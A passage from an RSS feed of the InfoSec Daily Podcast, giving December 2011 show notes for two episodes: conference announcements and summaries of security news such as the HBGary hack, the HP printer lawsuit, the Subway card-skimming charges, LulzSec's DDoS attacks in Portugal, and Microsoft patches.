Thus, the SIIA is warning shoppers to be on the lookout this holiday season for pirated software.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. If the Price Is Too Good to Be True, It Probably Is</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. &nbsp;Check the Seller or Website&#39;s Reputation</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If You Use an Auction Site, Check the Seller&#39;s Other Auctions</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Check the Seller&#39;s History</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Check the Location of the Seller</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pay Attention to Auction Length</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&#39;t Be Fooled by Official-looking Logos and Graphics</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Look for Special Activation/Registration Instructions</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Do Not Buy Compilations</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pay Special Attention to How the Software Is Advertised</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.infoworld.com/d/networking/google-deploys-ipv6-internal-network-181360"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/networking/google-deploys-ipv6-internal-network-181360</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google engineer tells Usenix conference the IPv6 project is already bearing fruit even though only halfway finished</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a project that has taken longer than company engineers anticipated, Google is rolling out IPv6 across its entire internal employee network.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google network engineer Irena Nikolova discussed the company-wide implementation at the Usenix Large Installation System Administration (LISA) conference, being held this week in Boston. There, she shared some lessons that other organizations might benefit from as they migrate their own networks to </span><a href="http://www.networkworld.com/news/2011/100511-ipv6-thought-leaders-251649.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the next generation Internet Protocol</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">From the experience, Google has learned that an IPv6 migration involves more than just updating the software and hardware. It also requires buy-in from management and staff, particularly administrators who already are juggling too many tasks. And, for early adopters, it requires a lot of work with vendors to get them to fix buggy and still-unfinished code. &quot;We should not expect something to work just because it is declared supported,&quot; </span><a href="http://www.usenix.org/events/lisa11/tech/full_papers/Babiker.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the paper</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> accompanying the presentation concluded.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.cio.com/article/696248/Anonymous_Attack_on_HBGary_Federal_Didn_t_Ruin_Us_Says_CEO"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cio.com/article/696248/Anonymous_Attack_on_HBGary_Federal_Didn_t_Ruin_Us_Says_CEO</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When HBGary Federal, had its website hacked and sensitive e-mail exposed by hacktivist group Anonymous last February, it became a question of how Sacramento, Calif.-based security firm HBGary could survive the damage to its reputation.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But in spite of the bruising, HBGary not only didn&#39;t lose business customers in the course of the past year, but &quot;we ended up getting additional business,&quot; says Greg Hoglund, founder and CEO of HBGary. Calling it an unexpected and even &quot;weird side effect,&quot; Hoglund said the widely-publicized attack by Anonymous on HBGary Federal, a separate company set up by HBGary in 2009 to market to the federal government, appears to have elicited a sense of identification from many other companies. &quot;They saw us go through things they were experiencing,&quot; he says.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last February, </span><a href="http://krebsonsecurity.com/2011/02/hbgary-federal-hacked-by-anonymous/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">members of Anonymous</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, apparently furious that then-CEO of HBGary Federal, Aaron Barr, had publicly alluded to his effort to infiltrate the hacktivist group to expose its leaders, lashed out by breaking into the HBGary Federal website. Anonymous then seized tens of thousands of the firm&#39;s e-mails to post them online. The dark episode even had HBGary President Penny Leavy, Hoglund&#39;s wife, going onto an Anonymous IRC channel to basically beg for the attack to end.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.zdnet.co.uk/news/security-management/2011/12/09/hp-faces-lawsuit-over-printer-security-claims-40094625/?s_cid=938"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.co.uk/news/security-management/2011/12/09/hp-faces-lawsuit-over-printer-security-claims-40094625/?s_cid=938</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A lawsuit against HP alleges that the company sold LaserJet printers that it knew had a security flaw in them that could allow hackers to steal data, take control of networks and even cause physical damage to printers through overheating.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The suit, filed last week in district court in San Jose, California, accuses HP of knowingly selling printers with a design defect that renders them &quot;highly vulnerable to attacks by hackers&quot;. The plaintiff, David Goldblatt of New York, said he would not have purchased two HP printers had he known about the problems. It alleges HP violated the California laws designed to protect consumers and prohibit fraudulent or deceptive business practices and seeks class-action status.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The issue stems from the fact that software on the printers that allows for updates over the internet does not use digital signatures to verify the authenticity of any software upgrades or modifications downloaded to the printers, according to the lawsuit.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An HP spokesman told ZDNet UK&#39;s sister site CNET News via email on Thursday that the company does not comment on pending litigation.</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-542-subway-skimmers-attt-how-not-to-get-pirated-software-google-ipv6-hbgary-and-insecure-hp-printers/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3254/0/infosec-daily-podcast-episode-542.mp3" length="24836643" type="audio/mpeg" />
		<itunes:duration>0:51:44</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 542 for December 9, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Special Guest: Johnny Cocaine
	&#160;
Announcements:
Brad Smith ([...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 542 for December 9, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Special Guest: Johnny Cocaine
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.scmagazineus.com/four-charged-with-hacking-subway-other-retailers/article/218702
	Four Romanian nationals have been charged with remotely hijacking the credit card processing systems of more than 150 Subway restaurants in the United States, along with dozens of other unnamed retailers, the federal prosecutors announced Thursday.
	The defendants, all in their 20s, compromised the credit card data of 80,000 customers and made millions of dollars in unauthorized purchases, according to the U.S. Department of Justice. Starting in 2008 and through May of this year, the defendants hacked into more than 200 U.S.-based merchants&#39; point-of-sale (POS) systems, which are used to process transactions.
	The defendants &#8211; Adrian-Tiberiu Oprea, 27, of Constanta; Iulian Dolan, 27, of Craiova; Cezar Iulian Butu, 26, of Ploiesti; and Florin Radu, 23, of Rimnicu Vilcea &#8211; &#160;each were charged in New Hampshire with conspiracy to commit computer fraud, wire fraud and access device fraud.
	Oprea was arrested last week in Romania and is currently in custody there. Butu and Dolan were both arrested in mid-August upon entering the United States. Radu remains at large.
	&#8230;.
	Source: &#160;http://www.infoworld.com/d/the-industry-standard/doj-tells-judge-theres-no-active-att-deal-t-mobile-181379
	The U.S. Department of Justice will file a motion to stay or dismiss its lawsuit to block AT&#38;T&#39;s acquisition of T-Mobile USA because the agency believes there&#39;s no deal pending, a lawyer for the DOJ said Friday.
	The DOJ will file the motion on Tuesday in response to AT&#38;T&#39;s decision in November to withdraw its application at the U.S. Federal Communications Commission for the transfer of T-Mobile&#39;s spectrum licenses to AT&#38;T, said Joseph Wayland, the DOJ&#39;s lead attorney in the case. &#34;It&#39;s not a real[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 541 &#8211; LulzSec is Back!, MS 14 Patches, Aussie’s Hiring, Top 2011 Hacks, Cnet Apology, Predictions</title>
		<link>http://www.isdpodcast.com/episode-541-lulzsec-is-back-ms-14-patches-aussie%e2%80%99s-hiring-top-2011-hacks-cnet-apology-predictions</link>
		<comments>http://www.isdpodcast.com/episode-541-lulzsec-is-back-ms-14-patches-aussie%e2%80%99s-hiring-top-2011-hacks-cnet-apology-predictions#comments</comments>
		<pubDate>Fri, 09 Dec 2011 01:43:44 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3249</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 541 for December 8, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 541 for December 8, 2011. &nbsp;&nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.darkreading.com/security/attacks-breaches/232300133/resurgent-lulzsec-attacks-government-sites-in-portugal.html"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/security/attacks-breaches/232300133/resurgent-lulzsec-attacks-government-sites-in-portugal.html</span></a></p>
<p>
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacktivist group LulzSec was back in action last week, launching distributed denial-of-service (DDoS) attacks on government websites in Portugal.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group says it was driven to the attacks by Portuguese austerity measures, social inequalities, and recent police violence against demonstrators during a protest on Nov. 24, according to </span><a href="http://www.examiner.com/anonymous-in-national/lulzsec-anonymous-hacktivists-strike-portugal-after-police-brutality"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">news reports</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Friday, LulzSec Portugal launched a DDoS attack against the website of Banco de Portugal (Bank of Portugal), making the site inaccessible, according to the reports. In addition to taking down the Bank of Portugal website, LulzSec Portugal has been credited with successful attacks on numerous state services. Earlier this week, LulzSec disabled the websites of the Portugal House of Parliament, several political parties, and the national police.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last Sunday, LulzSec Portugal released the name, rank, identification number, contact information, and employment history for more than 100 national police officers believed to have taken part in the police. &quot;2011 is the year of revolutions and the biggest hacks in history (until now ..),&quot; the group said in an online statement. &quot;We are creating a way for the revolution global.&quot;</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9222530/Update_Microsoft_plans_20_patches_next_week_will_fix_Duqu_and_BEAST_bugs"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9222530/Update_Microsoft_plans_20_patches_next_week_will_fix_Duqu_and_BEAST_bugs</span></a></p>
<p>
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft today announced it will issue 14 security bulletins next week to patch 20 vulnerabilities in Windows, Internet Explorer (IE), Office, and Windows Media Player.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Among the patches will be ones that plug the hole used by the Duqu intelligence-gathering Trojan, and fix the SSL (secure socket layer) 3.0 and TLS (transport layer security) 1.0 bug popularized three months ago by the BEAST, for &quot;Browser Exploit Against SSL/TLS,&quot; hacking tool.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;They&#39;re all over the map,&quot; said Andrew Storms, director of security operations at nCircle Security, describing the wide range of Microsoft products slated for patching. &quot;It looks like a big cleanup, where they&#39;re trying to get as much as they can off their plate before the end of the year.&quot;</span><br />
